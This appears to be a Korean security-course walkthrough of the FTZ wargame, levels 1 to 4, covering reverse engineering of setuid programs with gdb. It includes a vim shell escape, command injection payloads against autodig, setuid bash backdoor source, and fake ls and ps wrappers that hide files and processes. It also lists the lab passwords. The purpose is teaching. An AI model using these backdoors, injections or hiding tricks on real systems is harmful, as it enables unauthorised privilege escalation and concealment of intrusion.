0x80487c0 <_IO_stdin_used+348>:  "\n\t\tmy-pass 명령은 사용할 수 없습니다.\n\n"
(gdb) x/s 0x80487e8
0x80487e8 <_IO_stdin_used+388>:  "chmod"
(gdb) x/s 0x8048800
0x8048800 <_IO_stdin_used+412>:  "\n\t\tchmod 명령은 사용할 수 없습니다.\n\n"
(gdb) x/s 0x8048826
0x8048826 <_IO_stdin_used+450>:  "\n\n"
(gdb) quit


■ 분석한 내용을 바탕으로 의사 코드로 복원해 보면 다음과 같다.
# vi ExecuteMe.c

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{

        char input[29];
        char denyMyPass[] = "my-pass";
        char denyChmod[] = "chmod";

        system("/usr/bin/clear");
        chdir("/home/level2");
        printf("\n\n\n\t\t레벨2의 권한으로 당신이 원하는 명령어를\n");
        printf("\t\t한가지 실행시켜 드리겠습니다.\n");
        printf("\t\t(단, my-pass와 chmod는 제외)\n");
        printf("\t\t\t어떤 명령을 실행시키겠습니까?\n");
        printf("\n\n\t\t[level2@ftz level2]$ ");

        fgets(input, sizeof(input), stdin);

        if(strstr(input, denyMyPass) != NULL )
        {
                        printf("\n\tmy-pass 명령은 사용할 수 없습니다.\n\n");
                        exit(0);
        }

        if(strstr(input, denyChmod) != NULL )
        {
                        printf("\n\t\tchmod 명령은 사용할 수 없습니다.\n\n");
                        exit(0);
        }
        printf("\n\n");

        setreuid(3002,3002);
        system(input);
}

-> 프로그램을 해석해 보자.
-> [참고] Remote Shell/Web Shell은 무엇인가?
    -> C언어의 system() 함수는 시스템에 명령을 실행할 때 사용하는 함수이다.
    -> Java , PHP, Perl, Python 등 대부분의 언어에도 비슷한 함수가 존재한다.

의사코드에서 알수 있는 정보
● ExecuteMe 프로그램 실행시 프롬프트는 printf 함수로 만들어 진것이다.
● system() 함수를 통해 stdin 입력된 명령어를 수행한다.




■ 원본 소스 코드

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main() {

        char cmd[30];
        system("/usr/bin/clear");
        chdir("/home/level2");
        printf("\n\n\n\t\t레벨2의 권한으로 당신이 원하는 명령어를\n");
        printf("\t\t한가지 실행시켜 드리겠습니다.\n");
        printf("\t\t(단, my-pass 와 chmod는 제외)\n");
        printf("\n\t\t어떤 명령을 실행시키겠습니까?\n");
        printf("\n\n\t\t[level2@ftz level2]$ ");
        fgets(cmd, 30, stdin);
        if( strstr( cmd, "my-pass") != 0 ){
                printf("\n\t\tmy-pass 명령은 사용할 수 없습니다.\n\n");
                exit(0);
                }
        if( strstr( cmd, "chmod") != 0 ) {
                printf("\n\t\tchmod 명령은 사용할 수 없습니다.\n\n");
                exit(0);
        }
        printf("\n\n");
        setreuid( 3002, 3002 );
        system(cmd);
}





[실습] 추가적인 실습

다음과 같은 소스 코드에 대한 디어셈블리 과정을 정리한다.
# vi test_main.c

main()
{

}





0x080482f4 <main+0>:    push   %ebp
0x080482f5 <main+1>:    mov    %esp,%ebp
0x080482f7 <main+3>:    sub    $0x8,%esp
0x080482fa <main+6>:    and    $0xfffffff0,%esp
0x080482fd <main+9>:    mov    $0x0,%eax
0x08048302 <main+14>:   sub    %eax,%esp
0x08048304 <main+16>:   leave
0x08048305 <main+17>:   ret
0x08048306 <main+18>:   nop
0x08048307 <main+19>:   nop


# vi test_main2.c

#include <stdio.h>

int main(void)
{

return 0;

}


0x080482f4 <main+0>:    push   %ebp
0x080482f5 <main+1>:    mov    %esp,%ebp
0x080482f7 <main+3>:    sub    $0x8,%esp
0x080482fa <main+6>:    and    $0xfffffff0,%esp
0x080482fd <main+9>:    mov    $0x0,%eax
0x08048302 <main+14>:   sub    %eax,%esp
0x08048304 <main+16>:   mov    $0x0,%eax
0x08048309 <main+21>:   leave
0x0804830a <main+22>:   ret
0x0804830b <main+23>:   nop




# vi test_main3.c

#include <stdio.h>

int main(void)
{

int a=10;

return 0;

}

0x080482f4 <main+0>:    push   %ebp
0x080482f5 <main+1>:    mov    %esp,%ebp
0x080482f7 <main+3>:    sub    $0x8,%esp
0x080482fa <main+6>:    and    $0xfffffff0,%esp
0x080482fd <main+9>:    mov    $0x0,%eax
0x08048302 <main+14>:   sub    %eax,%esp
0x08048304 <main+16>:   movl   $0xa,0xfffffffc(%ebp)
0x0804830b <main+23>:   mov    $0x0,%eax
0x08048310 <main+28>:   leave
0x08048311 <main+29>:   ret
0x08048312 <main+30>:   nop
0x08048313 <main+31>:   nop


# vi test_main4.c

#include <stdio.h>

int main(void)
{

int a=10;

printf("a: %d", a);

return 0;

}





0x08048328 <main+0>:    push   %ebp
0x08048329 <main+1>:    mov    %esp,%ebp
0x0804832b <main+3>:    sub    $0x8,%esp
0x0804832e <main+6>:    and    $0xfffffff0,%esp
0x08048331 <main+9>:    mov    $0x0,%eax
0x08048336 <main+14>:   sub    %eax,%esp
0x08048338 <main+16>:   movl   $0xa,0xfffffffc(%ebp)
0x0804833f <main+23>:   sub    $0x8,%esp
0x08048342 <main+26>:   pushl  0xfffffffc(%ebp)
0x08048345 <main+29>:   push   $0x8048408
0x0804834a <main+34>:   call   0x8048268 <printf>
0x0804834f <main+39>:   add    $0x10,%esp
0x08048352 <main+42>:   mov    $0x0,%eax
0x08048357 <main+47>:   leave
0x08048358 <main+48>:   ret
0x08048359 <main+49>:   nop
0x0804835a <main+50>:   nop
0x0804835b <main+51>:   nop



[실습] 위와 같은 C 언어 코드와 어셈블리 언어 코드 테이블을 만든다.(시간: 2시간)

[과제] gdb(디버거) 사용법에 대해서 조사한다.




(정리) 공격 방법과 관련 기술 정리

공격한 방법에 대한 순서 정리
● 힌트 정보 확인(# cat hint)
● 힌트 내용에 맞는 파일 검색(# find / -user level2 -perm -4000 2>/dev/null)
● 찾은 프로그램 실행(# /bin/ExecuteMe)-> 의사 코드 복원(GDB 사용)
● 찾은 프로그램의 버그 확인(다양한 방법)

관련된 기술 정리
● find 명령어 사용법
● 특수퍼미션(SetUID)의 개념
● 어셈블리에 대한 소개
● GDB 사용법에 대한 소개
● 백도어에 대한 개념




2
 Leve2 -> Leve3





단원의 목적
● 편집기 사용법


■ Level2 문제에 도전하기

level2 사용자로 로그인
-> ID/PASS: level2/hacker or cracker

[level2@ftz level2]$ ls -l

-rw-r--r--    1 root     root           60  3월 23  2000 hint
drwxr-xr-x    2 root     level2       4096  2월 24  2002 public_html
drwxrwxr-x    2 root     level2       4096  1월 16  2009 tmp


[level2@ftz level2]$ cat hint


텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...



[level2@ftz level2]$ find / -user level3 -perm -4000 2>/dev/null

/usr/bin/editor


[level2@ftz level2]$ ls -l /usr/bin/editor

-rwsr-x---    1 level3   level2      11651  8월 19 12:58 /usr/bin/editor


[level2@ftz level2]$ which vi

alias vi='vim'
        /usr/bin/vim


[level2@ftz level2]$ ls -l /bin/vi

-rwxr-xr-x    1 root     root       456108  2월 12  2003 /bin/vi


[level2@ftz level2]$ ls -l /usr/bin/vim

-rwxr-xr-x    1 root     root      1893740  2월 12  2003 /usr/bin/vim


    [참고] 필요하면 명령어 수행
    # /bin/vi
    # /usr/bin/vim 


[level2@ftz level2]$ /usr/bin/editor

~
~
~
~                              VIM - Vi IMproved
~
~                               version 6.1.320
~                           by Bram Moolenaar et al.
~                 Vim is open source and freely distributable
~
~                        Help poor children in Uganda!
~                type  :help iccf<Enter>       for information
~
~                type  :q<Enter>               to exit
~                type  :help<Enter>  or  <F1>  for on-line help
~                type  :help version6<Enter>   for version info
~
~
~
:! id

uid=3003(level3) gid=3002(level2) groups=3002(level2)

Hit ENTER or type command to continue<ENTER>
:! bash


[level3@ftz level2]$ my-pass


Level3 Password is "can you fly?".



[level3@ftz level2]$ exit

exit

shell returned 37

Hit ENTER or type command to continue
<ENTER>
:q!


[level2@ftz level2]$ telnet localhost
level3/can you fly?

[level3@ftz level3]$ exit
[level2@ftz level2]$


[용어] 편집기 백도어




■ 리버싱을 통한 의사 코드 복원

[level2@ftz level2]$ gdb /usr/bin/editor

GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) disas main
Dump of assembler code for function main:
0x08048360 <main+0>:    push   %ebp
0x08048361 <main+1>:    mov    %esp,%ebp
0x08048363 <main+3>:    sub    $0x8,%esp
0x08048366 <main+6>:    and    $0xfffffff0,%esp
0x08048369 <main+9>:    mov    $0x0,%eax
0x0804836e <main+14>:   sub    %eax,%esp
0x08048370 <main+16>:   sub    $0x8,%esp
0x08048373 <main+19>:   push   $0xbbb    /* 0xbbb : (10진수) 3003 */
0x08048378 <main+24>:   push   $0xbbb    /* 0xbbb : (10진수) 3003 */
0x0804837d <main+29>:   call   0x80482a0 <setreuid> /* int setreuid(uid_t ruid, uid_t
                        euid); */
0x08048382 <main+34>:   add    $0x10,%esp
0x08048385 <main+37>:   sub    $0xc,%esp
0x08048388 <main+40>:   push   $0x8048444
0x0804838d <main+45>:   call   0x8048280 <system>
0x08048392 <main+50>:   add    $0x10,%esp
0x08048395 <main+53>:   leave
0x08048396 <main+54>:   ret
0x08048397 <main+55>:   nop
End of assembler dump.
(gdb) x/2x 0x8048444
0x8048444 <_IO_stdin_used+4>:   0x6e69622f      0x0069762f
(gdb) x/s 0x8048444
0x8048444 <_IO_stdin_used+4>:    "/bin/vi"
(gdb) quit


[참고] setreuid 함수에 대해서(Real UID/Effective UID)


분석한 내용을 바탕으로 의사 코드로 복원해 보면 다음과 같다.
# vi /usr/bin/editor.c

#include <stdio.h>

int main()
{

    setreuid(3003, 3003);
    system("/bin/vi");

}


의사코드를 통해 알수 있는 내용
● 편집기 백도어 프로그램


[참고] 기존 프로그램 대치하는 프로그램(쉘 스크립트)






Effective UID, Real UID & Effective GID, Real GID




■ setreuid() 함수

# export LANG=C
# man setreuid
NAME
       setreuid, setregid - set real and/or effective user or group ID

SYNOPSIS
       #include <sys/types.h>
       #include <unistd.h>

       int setreuid(uid_t ruid, uid_t euid);
       int setregid(gid_t rgid, gid_t egid);

DESCRIPTION
       setreuid  sets  real  and  effective  user  IDs of the current process.
       Unprivileged users may only set the real user ID to the real user ID or
       the  effective  user  ID, and may only set the effective user ID to the
       real user ID, the effective user ID or the saved user ID.

       Supplying a value of -1 for either the real or effective user ID forces
       the system to leave that ID unchanged.

       If  the  real user ID is set or the effective user ID is set to a value
       not equal to the previous real user ID, the saved user ID will  be  set
       to the new effective user ID.

       Completely  analogously, setregid sets real and effective group ID's of
       the current process, and all of the above holds with "group" instead of
       "user".



UID(User Identification)/EUID(Effective UID)
GID(Group Identification)/EGID(Effective GID)

Real UID : ==> # who am i  (!!! 내가 어떤 사용자로 로그인 했는가 !!!)
/etc/passwd (user01:x:500:500::/home/user01:/bin/bash)

Eeffective UID: ==> # id   or   # whoami  (!!! 현재 내가 누가인가 !!!)

(linux200)
[EX] UID/EUID 실습
# telnet localhost
user01 사용자로 로그인

$ who am i
$ id
$ whoami

$ su - user02
$ who am i
$ id
$ whoami

$ su - root
# who am i
# id
# whoami








기존의 프로그램을 대치하는 프로그램




■ 사용 시스템
- linux200





[실습1] /usr/bin/passwd 명령어를 대치하는 프로그램을 만들어 보자.

● (목적) 좋은 용도(EX: /usr/bin/passwd)
● /usr/bin/passwd 명령어를 사용할 때 누가(id CMD)/언제(data CMD) 실행했는지 별도의 로그 파일에 기록할 수 있

는가?

① /usr/bin/passwd 명령어를 대치할 프로그램 만들기
# vi /root/bin/passwd

#!/bin/bash

id >> /test/passwd.log
date >> /test/passwd.log
echo >> /test/passwd.log

/usr/bin/passwd.old $*         /* # mv /usr/bin/passwd /usr/bin/passwd.old */


# touch /test/passwd.log
# chmod 777 /test/passwd.log    /* 테스트용 퍼미션 */

# chmod 755 /root/bin/passwd

② /usr/bin/passwd 명령어를 새로 만들어진 프로그램으로 대치
# mv /usr/bin/passwd /usr/bin/passwd.old
# cp /root/bin/passwd /usr/bin/passwd

③ 정상적으로 동작하는지 테스트
# which passwd

/usr/bin/passwd


# passwd user01

Changing password for user user01.
New UNIX password: (user01)
BAD PASSWORD: it is based on a dictionary word
Retype new UNIX password: (user01)
passwd: all authentication tokens updated successfully.

-> 관리자의 암호 변경

# cat /test/passwd.log

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Tue Dec 23 11:20:39 KST 2014



(복원작업) !!!! 반드시 복원해야 한다.!!!!
# mv /usr/bin/passwd.old /usr/bin/passwd




[실습2] /bin/ls, /bin/ps 명령어를 대치하는 프로그램을 만들어 보자.

● (목적) 악의적인 용도(EX: /bin/ls)
● /bin/ls(Orignal program) ==== 교체 ====> /bin/ls(Hacker's program)# ls -> 내가 설치한 프로그램은 안보이도

록 설정-> 파일 이름: hacker_file
● /bin/ps(Orignal program) ==== 교체 ====> /bin/ps(Hacker's program)# ps -ef -> 자신이 띄운 프로세스는 안보

이도록 설정-> 프로세스 이름: hacker_process

[실습2-1] Fake ls 명령어 생성

① /bin/ls 명령어를 대신할 /root/bin/ls 명령어 만들기(Fake ls 명령어 생성)
# vi /root/bin/ls

#!/bin/bash

/bin/ls $* | grep -v hacker_file


# chmod 755 /root/bin/ls

② 테스트
# cd /test
# touch hacker_file
# /root/bin/ls

dir1
file1
passwd.log

-> hacker_file 파일이 보이는가?

# /bin/ls

dir1  file1  hacker_file  passwd.log

-> hacker_file 파일이 보이는가?

# /root/bin/ls -altr

-rw-r--r--  1 root root    0 Dec 22 12:28 file1
drwxr-xr-x  2 root root 4096 Dec 22 12:28 dir1
drwxr-xr-x 26 root root 4096 Dec 23 09:44 ..
-rw-r--r--  1 root root  118 Dec 23 11:20 passwd.log
drwxr-xr-x  3 root root 4096 Dec 23 11:29 .


# /root/bin/ls /root/bin/*.sh

/root/bin/add_userlist.sh
/root/bin/arp.sh
/root/bin/auto_ftp2.sh
/root/bin/auto_ftp.sh
/root/bin/auto_telnet_ftp.sh
/root/bin/banner_telnet.sh
/root/bin/bomb_exec.sh
/root/bin/bomb.sh
.... (중략) ....



    ■ /bin/ls(Orignal program) ==== 교체 ====> /root/bin/ls(Hacker's program)
    # cp /bin/ls /bin/ls.old
    # cp /root/bin/ls /bin/ls
    # vi /bin/ls
    /bin/ls.old $* | grep -v hacker_file

[실습 2-2] Fake ps 명령어 생성

① /bin/ps 명령어 대신할 /root/bin/ps 명령어 생성(Fake ps 명령어 생성)
[TERM1] 명령어1 터미널
# vi /root/bin/ps

#!/bin/bash

/bin/ps "$*" | egrep -v hacker_process


# chmod 755 /root/bin/ps

② 테스트를 위한 일반 프로세스 생성
# cd /test
# vi hacker_process

#!/bin/bash

sleep 86400


# chmod 755 hacker_process
# ./hacker_process

③ 테스트
[TERM2] 명령어2 터미널
# /root/bin/ps -ef | grep hacker_process
#
-> hacker_process 프로세스가 보이는가?

# /bin/ps -ef | grep hacker_process

root      6290  5983  0 11:36 pts/1    00:00:00 /bin/bash ./hacker_process

-> hacker_process 프로세스가 보이는가?

    ■ /bin/ps(Orignal program) ==== 교체 ====> /root/bin/ps(Hacker's program)
    # cp /bin/ps /bin/ps.old
    # cp /root/bin/ps /bin/ps
    # vi /bin/ps
    /bin/ps.old "$*" | egrep -v hacker_process









3
 Leve3 -> Leve4


단원의 목적
● system() 함수의 취약점



■ Level4 문제에 도전하기

level3 사용자로 로그인
-> ID/PASS: level3/can you fly?


[level3@ftz level3]$ ls -l

합계 12
-rw-r--r--    1 root     root          543 11월 26  2000 hint
drwxr-xr-x    2 root     level3       4096  2월 24  2002 public_html
drwxrwxr-x    2 root     level3       4096  1월 15  2009 tmp


[level3@ftz level3]$ cat hint

다음 코드는 autodig의 소스이다.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv){

    char cmd[100];

    if( argc!=2 ){
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }

    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");

    system( cmd );      /* # dig @168.126.63.1 version.bind chaos txt */

}

이를 이용하여 level4의 권한을 얻어라.

more hints.
- 동시에 여러 명령어를 사용하려면?
- 문자열 형태로 명령어를 전달하려면?


소스 코드를 통해 알수 있는 내용
● (예) # dig @168.126.63.1 version.bind chaos txt

    [참고] dig/host/nslookup 명령어 사용법



dig 명령어 사용법



Name Service Look Up CMD(s)
● nslookup CMD (# nslookup www.daum.net)
● host CMD     (# host www.daum.net)
● dig CMD      (# dig www.daum.net)


(linux200)

# man dig

NAME
       dig - DNS lookup utility

SYNOPSIS
       dig [@server] [-b address] [-c class] [-f filename]
           [-k filename] [-m] [-p port#] [-t type] [-x addr]
           [-y name:key] [-4] [-6] [name] [type] [class]
           [queryopt...]

       dig [-h]

       dig [global-queryopt...] [query...]

DESCRIPTION
       dig (domain information groper) is a flexible tool for
       interrogating DNS name servers. It performs DNS lookups
       and displays the answers that are returned from the name
       server(s) that were queried. Most DNS administrators use
       dig to troubleshoot DNS problems because of its
       flexibility, ease of use and clarity of output. Other
       lookup tools tend to have less functionality than dig.

       Although dig is normally used with command-line
       arguments, it also has a batch mode of operation for
       reading lookup requests from a file. A brief summary of
       its command-line arguments and options is printed when
       the -h option is given. Unlike earlier versions, the
       BIND 9 implementation of dig allows multiple lookups to
       be issued from the command line.

SIMPLE USAGE
       A typical invocation of dig looks like:

        dig @server name type

       where:

       server is the name or IP address of the name server to
              query. This can be an IPv4 address in
              dotted-decimal notation or an IPv6 address in
              colon-delimited notation. When the supplied
              server argument is a hostname, dig resolves that
              name before querying that name server. If no
              server argument is provided, dig consults
              /etc/resolv.conf and queries the name servers
              listed there. The reply from the name server that
              responds is displayed.

       name   is the name of the resource record that is to be
              looked up.

       type   indicates what type of query is required — ANY,
              A, MX, SIG, etc.  type can be any valid query
              type. If no type argument is supplied, dig will
              perform a lookup for an A record.


■ dig 명령어 사용 예
# dig @168.126.63.1 kornet.net ANY
# dig @168.126.63.1 example.com ANY
# dig @168.126.63.1 google.com ANY

# dig @168.126.63.1 kornet.net MX             /* kornet.net.   MX  10   mail.kornet.net */
# dig @168.126.63.1 kornet.net NS             /* kornet.net.   NS       ns.kornet.net   */ 
# dig @168.126.63.1 www.kornet.net A          /* ns.kornet.net A        211.216.50.150  */
# dig @168.126.63.1 211.216.50.150 PTR        /* 150           PTR      ns.kornet.net   */

# dig @168.126.63.1 version.bind chaos txt    /* version.bind  txt      "hello"         */







[level3@ftz level3]$ find / -name autodig 2>/dev/null

/bin/autodig


[level3@ftz level3]$ ls -l /bin/autodig

-rwsr-x---    1 level4   level3      12194  8월 19 12:58 /bin/autodig


[level3@ftz level3]$ find / -user level4 -perm -4000 2>/dev/null

/bin/autodig

[level3@ftz level3]$ /bin/autodig 168.126.63.1

; <<>> DiG 9.2.1 <<>> @168.126.63.1 version.bind chaos txt
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42564
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;version.bind.                  CH      TXT

;; ANSWER SECTION:
version.bind.           0       CH      TXT     "Cyber World Leader Kornet!"

;; AUTHORITY SECTION:
version.bind.           0       CH      NS      version.bind.

;; Query time: 20 msec
;; SERVER: 168.126.63.1#53(168.126.63.1)
;; WHEN: Thu Aug 21 22:02:45 2014
;; MSG SIZE  rcvd: 83


    ------------- /bin/autodig ----------------
        strcpy( cmd, "dig @" );
        strcat( cmd, argv[1] );
        strcat( cmd, " version.bind chaos txt");
        system( cmd );
    ------------- /bin/autodig ----------------
    # /bin/autodig 168.126.63.1
    # dig @168.126.63.1 version.bind chaos txt

[level3@ftz level3]$ dig @168.126.63.1 version.bind chaos txt

; <<>> DiG 9.2.1 <<>> @168.126.63.1 version.bind chaos txt
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8087
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;version.bind.                  CH      TXT

;; ANSWER SECTION:
version.bind.           0       CH      TXT     "Unknown"

;; AUTHORITY SECTION:
version.bind.           0       CH      NS      version.bind.

;; Query time: 31 msec
;; SERVER: 168.126.63.1#53(168.126.63.1)
;; WHEN: Thu Aug 21 22:03:36 2014
;; MSG SIZE  rcvd: 64




    ------------- /bin/autodig ----------------
        strcpy( cmd, "dig @" );
        strcat( cmd, argv[1] );
        strcat( cmd, " version.bind chaos txt");
        system( cmd );
    ------------- /bin/autodig ----------------
    # /bin/autodig "168.126.63.1 www.naver.com; id;"
    # dig @168.126.63.1 www.naver.com; id; version.bind chaos txt

[level3@ftz level3]$ /bin/autodig "168.126.63.1 www.naver.com; id;"

; <<>> DiG 9.2.1 <<>> @168.126.63.1 www.naver.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23453
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 3, ADDITIONAL: 3

;; QUESTION SECTION:
;www.naver.com.                 IN      A

;; ANSWER SECTION:
www.naver.com.          0       IN      CNAME   www.naver.com.nheos.com.
www.naver.com.nheos.com. 165    IN      A       125.209.222.141
www.naver.com.nheos.com. 165    IN      A       202.131.30.11

;; AUTHORITY SECTION:
nheos.com.              171165  IN      NS      ns2.nheos.com.
nheos.com.              171165  IN      NS      ns1.nheos.com.
nheos.com.              171165  IN      NS      ns3.nheos.com.

;; ADDITIONAL SECTION:
ns1.nheos.com.          1600    IN      A       119.205.240.148
ns2.nheos.com.          9307    IN      A       61.247.202.50
ns3.nheos.com.          171165  IN      A       175.158.30.74

;; Query time: 4 msec
;; SERVER: 168.126.63.1#53(168.126.63.1)
;; WHEN: Thu Aug 21 22:08:16 2014
;; MSG SIZE  rcvd: 199

uid=3004(level4) gid=3003(level3) groups=3003(level3)
sh: line 1: version.bind: command not found


    ------------- /bin/autodig ----------------
        strcpy( cmd, "dig @" );
        strcat( cmd, argv[1] );
        strcat( cmd, " version.bind chaos txt");
        system( cmd );
    ------------- /bin/autodig ----------------
    # /bin/autodig "168.126.63.1 www.naver.com; bash;"
    # dig @168.126.63.1 www.naver.com; bash; version.bind chaos txt

[level3@ftz level3]$ /bin/autodig "168.126.63.1 www.naver.com; bash;"

; <<>> DiG 9.2.1 <<>> @168.126.63.1 www.naver.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 7335
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 3, ADDITIONAL: 3

;; QUESTION SECTION:
;www.naver.com.                 IN      A

;; ANSWER SECTION:
www.naver.com.          0       IN      CNAME   www.naver.com.nheos.com.
www.naver.com.nheos.com. 31     IN      A       202.131.30.11
www.naver.com.nheos.com. 31     IN      A       125.209.222.142

;; AUTHORITY SECTION:
nheos.com.              11439   IN      NS      ns2.nheos.com.
nheos.com.              11439   IN      NS      ns1.nheos.com.
nheos.com.              11439   IN      NS      ns3.nheos.com.

;; ADDITIONAL SECTION:
ns1.nheos.com.          15523   IN      A       119.205.240.148
ns2.nheos.com.          161068  IN      A       61.247.202.50
ns3.nheos.com.          11439   IN      A       175.158.30.74

;; Query time: 3 msec
;; SERVER: 168.126.63.1#53(168.126.63.1)
;; WHEN: Thu Aug 21 22:09:38 2014
;; MSG SIZE  rcvd: 199


[level4@ftz level3]$ my-pass


Level4 Password is "suck my brain".







■ 백도어를 생성해 보자.

[level4@ftz level3]$ vi /tmp/backdoor.c

int main()
{

    char *cmd[2];
    cmd[0]="/bin/bash";
    cmd[1]=(void *)0;

    setreuid(3004,3004);
    execve(cmd[0], cmd, cmd[1]);   /* int  execve  (const  char  *filename, char
                                         *const argv [], char *const envp[]); */
}


[level4@ftz level3]$ gcc -o /tmp/". " /tmp/backdoor.c   /* /tmp/". " (점(.) + 공백 한칸) */
[level4@ftz level3]$ chmod 6755 /tmp/". "
[level4@ftz level3]$ ls -al /tmp

합계 56
drwxrwxrwt    8 root     root         4096  8월 21 22:20 .
-rwsr-sr-x    1 level4   level3      11677  8월 21 22:20 .
drwxr-xr-x   20 root     root         4096  8월 21 17:10 ..
drwxrwxrwt    2 root     root         4096  8월 21 17:10 .ICE-unix
-r--r--r--    1 root     root           11  8월 21 17:10 .X0-lock
drwxrwxrwt    2 root     root         4096  8월 21 17:10 .X11-unix
srwx------    1 root     nobody          0  8월 21 17:10 .fam_socket
drwxrwxrwt    2 xfs      xfs          4096  8월 21 17:10 .font-unix
srw-rw-rw-    1 root     root            0  8월 21 17:10 .gdm_socket
drwxr-xr-x    2 root     root         4096  8월 19 20:02 .mozilla
-rw-------    1 root     root         1024  8월 19 20:13 .rnd
-rw-r--r--    1 level4   level3        130  8월 21 22:19 backdoor.c
drwx------    2 root     root         4096  8월 21 17:10 orbit-root
drwx------    2 root     root         4096  8월 21 17:10 ssh-XX37ibNn


[level4@ftz level3]$ rm -f /tmp/backdoor.c
[level4@ftz level3]$ exit

exit
sh: line 1: version.bind: command not found


[level3@ftz level3]$ id

uid=3003(level3) gid=3003(level3) groups=3003(level3)


[level3@ftz level3]$ /tmp/". "

No value for $TERM and no -T specified
No value for $TERM and no -T specified

-> 에러메세지는 무시한다.

[level4@ftz level3]$ id

uid=3004(level4) gid=3003(level3) groups=3003(level3)


[level4@ftz level3]$ exit
[level3@ftz level3]$



■ 다른 방식으로 백도어를 만들어 보자.

    (EX: # /bin/autodig "127.0.0.1;CMD")

/bin/autodig "168.126.63.1 www.naver.com; bash;"

/bin/autodig "127.0.0.1;echo 'int main(){char *cmd[2];cmd[0]=\"/bin/sh\";cmd[1]=(void *)0;' >

/tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;echo 'setreuid(3004,3004);execve(cmd[0],cmd,cmd[1]);}' >> /tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;cat /tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;gcc -o /tmp/'.. ' /tmp/backdoor2.c;"
/bin/autodig "127.0.0.1;chmod 6755 /tmp/'.. ';"

(/tmp/backdoor2.c)

int main(){char *cmd[2];cmd[0]=\"/bin/sh\";cmd[1]=(void *)0;
setreuid(3004,3004);execve(cmd[0],cmd,cmd[1]);}



int main()
{
    char *cmd[2];
    cmd[0]=\"/bin/sh\";
    cmd[1]=(void *)0;

    setreuid(3004,3004);
    execve(cmd[0],cmd,cmd[1]);
}




4
 Leve4 -> Leve5



단원의 목적
● xinetd 방식(원격 백도어)


● xinetd 방식에 대한 이해
● (용어) 로컬백도어/원격백도어

■ Level5 문제에 도전하기

level4 사용자로 로그인
-> ID/PASS: level4/suck my brain

[level4@ftz level4]$ ls -l

합계 12
-rw-r--r--    1 root     root           50  2월 24  2002 hint
drwxr-xr-x    2 root     level4       4096  2월 24  2002 public_html
drwxrwxr-x    2 root     level4       4096  8월 22 15:52 tmp


[level4@ftz level4]$ cat hint


누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!



    [참고] xinetd 방식에 대해서

    ■ inetd 방식        ■ xinetd 방식
    -/etc/inetd.conf        - /etc/xinetd.conf, /etc/xinetd.d/*


xinetd 방식의 서비스



■ xinetd = inetd + extended(tcp_wrapper)

    Redhat 6.X ---------------------->    Redhat 7.X
    inetd(/etc/inetd.conf)        xinetd(/etc/xinetd.conf, /etc/xinetd.d/*)



■ 서버에서 서비스 하는 방법의 종류
standalone 방식의 서비스(EX: web, mail)
● 서버에서 서비스 데몬을 직접 띄워 놓고 서비스 하는 방식

xinetd 방식의 서비스(EX: telnet)
● 서버에서 xinetd 데몬을 띄워 놓고 클라이언트가 서비스 요청을 하면 그때 xinetd 데몬이 적당한 데몬을 띄워주

는 방식



standalone & xinetd 방식의 차이점

■ standalone 방식의 서비스(EX: web)
-> 서비스 요청이 많은 경우에 적당

----- client-----        ----- server(WEB) ----

http://www.daum.net        httpd(80)


■ xinetd 방식의 서비스(EX: telnet)
-> 서비스 요청이 적은 경우에 적당

----- client-----        ----- server(TELNET) ----

# telnet server 23        xinetd ----------> telnetd(23)
                /etc/xinetd.conf
                /etc/xinetd.d/*
                /etc/services

[참고] xinetd 데몬은 standalone 방식의 서비스 데몬이다.


(linux200)

[실습] xinetd 방식에 대한 간단한 실습
[TERM1]     # pgrep -lf telnet
    # telnet localhost
   
[TERM2]     # pgrep -lf telnet
[TERM3]     # telnet localhost
[TERM2]     # pgrep -lf telnet

[TERM3]     # exit
[TERM2]     # pgrep -lf telnet
[TERM1]     # exit
[TERM2]     # pgrep -lf telnet






[실습] xinetd 데몬과 설정파일에 대해서

----- client-----        ----- server(TELNET) ----

# telnet server 23        xinetd ----------> telnetd(23)
                /etc/xinetd.conf
                /etc/xinetd.d/*
                /etc/services

# pgrep -lf xinetd

4421 xinetd -stayalive -pidfile /var/run/xinetd.pid

-> xinetd 데몬은 standalone 방식의 서비스 데몬

# vi /etc/xinetd.conf

..... (중략) .....
# Generally, banners are not used. This sets up their global defaults
#
#       banner          =
#       banner_fail     =
#       banner_success  =
}

includedir /etc/xinetd.d

-> /etc/xinetd.conf 파일의 마지막 라인을 확인한다.

# cd /etc/xinetd.d 
# ls

chargen-dgram   discard-stream  gssftp       rsync
chargen-stream  echo-dgram      klogin       tcpmux-server
daytime-dgram   echo-stream     krb5-telnet  tftp
daytime-stream  eklogin         kshell       time-dgram
discard-dgram   ekrb5-telnet    rmcp         time-stream


# cat krb5-telnet

# default: off
